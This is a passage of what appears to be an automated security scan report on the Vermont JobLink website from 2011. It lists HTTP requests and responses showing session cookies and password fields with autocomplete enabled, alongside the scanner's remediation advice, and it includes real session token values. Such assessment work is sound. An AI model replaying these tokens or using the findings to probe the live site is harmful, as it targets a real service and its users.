HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
5. Password field with autocomplete enabledpreviousnext There are 6 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password fields with autocomplete enabled:
v_password
v_passwordverify
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password fields with autocomplete enabled:
password
passwordverify
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
